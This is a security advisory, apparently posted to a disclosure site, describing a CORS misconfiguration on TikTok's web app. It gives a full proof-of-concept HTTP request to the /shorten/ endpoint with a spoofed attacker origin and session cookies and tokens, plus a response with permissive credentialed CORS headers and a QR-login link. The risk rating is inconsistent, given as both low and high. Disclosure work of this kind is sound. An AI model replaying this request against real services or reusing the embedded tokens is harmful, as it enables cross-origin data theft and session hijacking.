TikTok - web app CORS Vulnerability

2024.12.22

nu11secur1ty (BG)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

## Titles: TikTok - web app CORS Vulnerability
## Author: nu11secur1ty
## Date: 12/21/2024
## Vendor: https://www.tiktok.com/
## Software: https://www.tiktok.com/
## Reference: https://portswigger.net/web-security/cors

## Description:
The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain. The application allowed access from the requested origin https://pwnedhost.com/PoC/Technical%20Details_%20Falcon%20Update%20for%20Windows%20Hosts%20_%20CrowdStrike.html  Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.  
An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.
Trusting arbitrary origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk.
If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP-based access controls by proxying through users' browsers. 

STATUS: HIGH Vulnerability


[+]Exploit:
- CORS:

```POST
POST /shorten/?WebIdLastTime=1734674578&aid=1988&app_language=en&app_name=tiktok_web&browser_language=en-US&browser_name=Mozilla&browser_online=true&browser_platform=Win32&browser_version=5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F131.0.6778.140%20Safari%2F537.36&channel=tiktok_web&cookie_enabled=true&data_collection_enabled=false&device_id=7450370510314489376&device_platform=web_pc&focus_state=true&from_page=search&history_len=2&is_fullscreen=false&is_page_visible=true&odinId=7450370536233960481&os=windows&priority_region=&referer=&region=BG&safe_token=true&screen_height=600&screen_width=800&tz_name=Europe%2FSofia&user_is_login=false&verifyFp=verify_m4wcgihp_LflsP3hp_6eMu_4s8v_9mIZ_13upefT6rIq8&webcast_language=en&msToken=RJ5N3lhi7vT0mXtG-Kqn1AwCeKUgB1t80x375zpJDSBWsJ8TqPyM1XKHKIa8DS4Hrahj-bHIY4e5EFyBIaeafYPvmyO7X-o87t7PSpc-ZgymSc-p9vFpKQNN8SU=&X-Bogus=DFSzswfOX11GFESst0Z8C41WyZnr&_signature=_02B4Z6wo00001M7APrQAAIDCL8DdtOrvfWTOwGoAAFTa71 HTTP/2
Host: www.tiktok.com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Cache-Control: max-age=0
Cookie: tt_csrf_token=MqzImxWz-uowm0jbGgvmcsBXSNsptjmz0psg; tt_chain_token=IjugFJXqyVjt+nCwUTDnKQ==; ak_bmsc=8C95CD36291DB4E2FB7FE462CACB988F~000000000000000000000000000000~YAAQDsUTAqVHCuGTAQAA+Ny95Rq1tx9Fq1jZGANl2Q3mnz22KxaDvHh9DG69TvkGZc+kyxWsMX673oZb+VPTz/7dO1MdwqOoI0duH0Xz91UsWY+ar5Hn9N34X7Sh+TYk4GRK3atnOFRWzGSKVW+xt/06bX4EsDb0212ontoHNHSCyTkJImig0u9a5T/sS6vh/0/VkjKvXrQOg0Hg8lkwowo6ESiJuZpLCGBCKibKorTgH18+qtJtyCbxkYKu3Kyr++vSlDhNEYrXF1Ta8TGfZXLG9LB3T4KGkHIaAw7woaGfUoitb1ggAAO82RVFiEc5gFm8YJKXm37505rgRRs7MR1Sd5Zf0yvcPH3iNbdAZGtL11TpmeEoZcIH+3yfAbpVTsNNbSyLYD1wDg==; delay_guest_mode_vid=3; tiktok_webapp_theme_source=system; tiktok_webapp_theme=light; ttwid=1%7CTA8TJR-FyN1FZWCT5DkEsU8m27S8VrtpSuTHRZ_uqf0%7C1734726251%7C59a1d474f0957eb88bbe2d1f85670ad3de5181c01468ee9b18bddc6dd5bee8bf; s_v_web_id=verify_m4wcgihp_LflsP3hp_6eMu_4s8v_9mIZ_13upefT6rIq8; passport_csrf_token=a3dfb2da343f40bb940a20239a8f58ab; passport_csrf_token_default=618d6ad984e98717d2cf671394161c16; msToken=eoNkSmSAUNr5sKzmU1ak8ESN6olpUJ3H-ZLw4l1V8VD-RivpopFX94wqiCZXZTJvKII9IqAAV6xFzfpPEXM3SKsOtbUTPWWQVhwb6P2ToijQ; msToken=RJ5N3lhi7vT0mXtG-Kqn1AwCeKUgB1t80x375zpJDSBWsJ8TqPyM1XKHKIa8DS4Hrahj-bHIY4e5EFyBIaeafYPvmyO7X-o87t7PSpc-ZgymSc-p9vFpKQNN8SU=
Origin: https://pwnedhost.com/PoC/Technical%20Details_%20Falcon%20Update%20for%20Windows%20Hosts%20_%20CrowdStrike.html
Referer: https://www.tiktok.com/search/video?%2f
X-Mssdk-Info: 8zhnTgv3iyvt9eA5NESOuvYvQp0BrKItxe4g1p5mheqMlFEguxzf4zaZzMVn05R.gecfwOWMk93efqnaTsLad4lFvT0dmfP0RdkMBQAM8ScrulN39Y-PbMjyTAHnpz2vDcuChDrTtxtAvIokkilI-J2uubETrXil02p7WrTTm7YCGl67b9v-Yw2ybSDXLNKbb8oaNp9pjhzHUXfHSaOccKh4cAR12KDueYJ7MTeWXZukV-U4gkRk1hPT9S-NhfDfjnpc4HgdCuFP3U9LdDs4PbxkN4lpSSPvApzDl9qoNpGURVP0TmGtl73nYXKDuy5Qtu7qlJiWLK6PWNsAuTphUwZWs0nKWQ.BQwKPtkPwSBXKWClv5GY-7FSAsdYapEUZosU8A0wtj5o.Z2YvBrzXme9-WvWXh48WRdqRd.Lg45am.bNK-xz9nNQ0TqmcK-U4ZLk8MO3EWWbtQGCiIsF.jdzfn-MUchyG9ZXgtsbHsKZy-gxvX8fnihiFEx4pRUpBqaVGH4s-Lc.pmEuqG8rCgqxlSALPcncfsaxMbh0UvwgeplxT.7it2fvs.6lRoMMKnVKTOlHpcjIBQwXDcclccbhT-VeBzi4Re9KoEmEf1-HR2vA3qhdFCEZ1OzG.QTHV0t3PNDmTLufih6Htvi-wmJ3sR8swCTUHW5gdxxIZ8jvawRV5pS283Pe.ArUc0i6aCvZsBmalQ0V6WANWFB5AQUoguS-5vKuqc4dcaGG-T8rNnHRxyU6KNA9DPSEd93FurAZL3YRzCM-vOjoUuxWXN2B9MqIqMgDAlYvdzl596hlM5jksL.KPmybOAV-ZZhDYhvJHxQzZzVc3KraM1HCOtfkeZjJhFQ5traPYeCQCo.aLuZFfjNLgZ8c6YCxovo2d9urYMGND5UGO4Gp1bdobJoBp59WfMwGCEt4Z48Mu.30L7h8.yd01pin79QOv-B3Kw01mPR7p2Wgj7Ku6T49PqK0Ot8XEE5dNZH3kPQIhWPUpXk8QCmninOcdJXs.PryfEKs71vIfDUk6PkUz9o2TBipSOd0g07iRXcL0Gjjtyy20J2voDpiFF-.j4GxRrBCCOOtOVn2ditFkQjzRtxytlIj94oifaKoo92vFYOyYtr8tCmqQYg2W3rh4VO8fbJs4f2hrWhDfk4neualoQoRTRmaR4FQCbr56Aj1h6kqxR5T.zJmKjLAEuRGrTI35luNdcPUL3ev500vtJKnytLZ8qKreuNCXEdbkvIt66NTgSqS.3M57o0vzPwqzJVscP0I.0lbi1VxLrDgOib99Rh0SVGfCzyNwZDcoHQUrnySqRKZK2wHXbY15As8Mn9K-ufTb8Bm4EtuWhCNTtx3wKTo0lgFFsuah-tswYEsqHATbEeAGv7DAwC-4Qsk-OYaD0NzIsZ3grsLrS49zHKkg615NTr.G8NeMOQkVEFTDlo9tMvOw50R3utrybtWQl71V1sTirND5IZCPKypUholxTs5OBqvzx7mjU4Xl9FnFcFeRpotDh7SnBYnz4WeajwHsKiE3rxp9xKEdjTgF6emlZpVqAj-GT.SxuVOmEEHOWLDPj.c6lyIHVphIof2U8BXqkYbwf8BPIKwXbubxzS1rBfmfpwzA5BSlOlEv0FCPOm.WGrrvq8U-YsFJfbJsVZeWM-QNxJzSzw3Jg-PlDHbZ2swrFMv.sOwZxHVEaa02Rf06Zmx9ASzGHSo.imY8X1y1gNpesgUVmVdlUTVSa0T-TssjivJxqZ3YcTC3C3-q4nNKoIWefNpEzR6Q6UhKwJc6QK5-JZOLAJ.jUKteX7qlJe2sFJ7npQywKk515m6w73P1SM6FGFO2mCb4wtRpC.OfRon-ycPePPAlW8SAOP-4cEa.u75Pie89reGjeRLH2gpRov6URPpdynPOJGq5PB3VKAA-yblOLlcrcZ-FgJDs..8wnzSqHQzxWl3O-Tlb3vghISjLaL03muhgFp6aUxSqJD6gYrajS0KPw7vKZOzKIWiyq3Hz.GJjfJsDBLLSTY0w9W-CFUaGXn2p7ikVbj9GFml.W-qpMUN7Q67A0qMHaF0t9LA4tQ5RkhcbN1OeRkCPVuWQMc-g2.oQc0REg4zgF7D1BlXdM3wRWYjdTHjR4MrLRe6j65mt7GayMI9MDv0JgECRAJQSHOjD-qrg0Uv1FcEjGgMjfEw7xkEx4TsNtuN9lxIZ8XXuMokF1b5CIiKEUBlrjt1TJrL3BEIbIBu45wNaqG1trpxa3R5CMNXE22SpfRezo1a7Igit1dMzh1QlFl.JA6HhiFjIwEhqS5mLwQMVm1oCdM5ViXvUNTzRr6teM77XeE0Gt3WxyT3M.y57udTkhwjx4.zitxb44Z2PMHwQLZbpTBhfBKQ3DO3yD4.fJZWeEe6SykT0FqtlcZgg1ubGQcG.1hXWlJ.LtFueaLrqcKNvSDDihMIetQCoqSMMVGyye8Gjqw7oHmv5tQH7jxf7t0a8di1hR.bWSp4zPMCxMerGoNJE0zcT5vviq8cqnw89XySfy1AkHs1ekJin29jO3Iievsgs1GM0f12gdCeoANg7SJPe-clu4e3InO7oGdmiq.4U2E-RhdUqxJ0JLdJqFsYB7rTXFZFL7fZaMBPhls8dTLlV.xZEiA-.HwacYA57-8h-Rwe5i8ywo4-wUdRSoe0oHj27wEZUm4XxVU16KIeOkHcsZLCMuvwe.qFc3TANgOSjjkeMo.gOHK6DHJQAz2CAcVbtTmiMoPC.QHrMUvTdsuj0yDC4BQBpuSeP.Kh5QdbJdLuLejp1BQB47tW48JU8VOWNTs-T.dGmpesMZKumlFayAWOkpFPAF99g8aw387tVJkbE1OZ8lhHYov49o9VppXscKSs9V9zlIta--2Ol6IzWJBQ4AaZMW6.LHVKVODrtvy7Ft6OusF70rPHLT1yKaWXUVv3Ce.fpEMIYP9yG.UDWwiAfywajsCOB803t4sCre8MA01H39s-9GmRWPG.GMAQDxf13lC6FiwrsqF0p6LODz1Ky4WuK95b-6sid-xz9Bm3shzuVeagQajrr0Yy8EqDtHocIv3AKWBl.1TpXdXcHbDyEUhz-Sp6pwKGZe8sOqc2c7-0VLaso-IaCOJBUUojHysK8BilHu8HLcv1Se1Eoesg9JBK18KZKBMZdcp4UlgX9Kk9DwLssOB6EBXp8uosFbw.vgzKyCe2jVGl1keHUdI5QFzCulk.jl02RSG8Lcjt9QTq7WgyVGLW36DKI8g17ukuv1m5Pb-216eksZU.1k7AJTW5toks4QmIkFhUICH9llkidT0jIqRvlnuKn1Ow2S63JpL0yvUnbsvUsNq-BCJPlqutmTJKNcog1jHN-Bm7Nb9p5JzEa9BTAayt1U3vlql62qq6aCbMLc-Jj
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 411

belong=tiktok-webapp-qrcode&persist=0&expired_time=3600&targets=https%3A%2F%2Fwww.tiktok.com%2Fpassport%2Fweb%2Fscan_index%2F%3Faid%3D1459%26append_common_params%3D1%26hide_nav_bar%3D1%26qr_source_aid%3D1459%26token%3DNdWvyBbpIg2ytsdp2-bJDxl7ReAe6hUXLkGJpzYxa5c%253D_useast2a%26app_type%3Dm%26next_url%3Dhttps%253A%252F%252Fwww.tiktok.com%252Fpassport%252Fweb%252Fscan_qrcode%252F%253Fclient_secret%253DQ189U88U
```

[+]Response:
```
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With,X-Nt-Engine
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT
Access-Control-Allow-Origin: https://pwnedhost.com/PoC/Technical%20Details_%20Falcon%20Update%20for%20Windows%20Hosts%20_%20CrowdStrike.html
X-Tt-Logid: 20241221060429F9F8B4FFA7AE546D2363
Server-Timing: inner; dur=12
X-Tt-Trace-Host: 018a039aebf9124d02d13f22efc360bc65d6d4ff7a7143382da6889adba7aecf9d528e657111c633b0e32784a68960a93e2cb1034cdd29c7e9a837e07db7332d33cebcd34c52721018214f1e06d01a4394706941a53a8d83381b594303bd0ec12e
X-Tt-Trace-Id: 00-241221060429F9F8B4FFA7AE546D2363-16B3F94E0A83DD67-00
Server: TLB
Expires: Sat, 21 Dec 2024 06:04:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 21 Dec 2024 06:04:30 GMT
Content-Length: 464
X-Cache: TCP_MISS from a2-23-154-110.deploy.akamaitechnologies.com (AkamaiGHost/11.7.2.1-9611f29bef89eba7b18045b10aa2af98) (-)
X-Tt-Trace-Tag: id=16;cdn-cache=miss;type=dyn
Server-Timing: cdn-cache; desc=MISS, edge; dur=9, origin; dur=118
X-Origin-Response-Time: 118,2.23.154.110
X-Akamai-Request-Id: 4db276c

{"code":0,"message":"success","now":1734761070,"data":[{"status":"success","target":"https://www.tiktok.com/passport/web/scan_index/?aid=1459\u0026append_common_params=1\u0026hide_nav_bar=1\u0026qr_source_aid=1459\u0026token=NdWvyBbpIg2ytsdp2-bJDxl7ReAe6hUXLkGJpzYxa5c%3D_useast2a\u0026app_type=m\u0026next_url=https%3A%2F%2Fwww.tiktok.com%2Fpassport%2Fweb%2Fscan_qrcode%2F%3Fclient_secret%3DQ189U88U","short_url":"https://www.tiktok.com/t/ZGHy7NaaKEWMj-hD6xC/"}]}
```

## Reproduce:
[href](https://www.patreon.com/posts/tiktok-cors-0-118402299)


## Info:
[href](https://portswigger.net/web-security/cors)

## Time spent:
12:07:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

TikTok - web app CORS Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.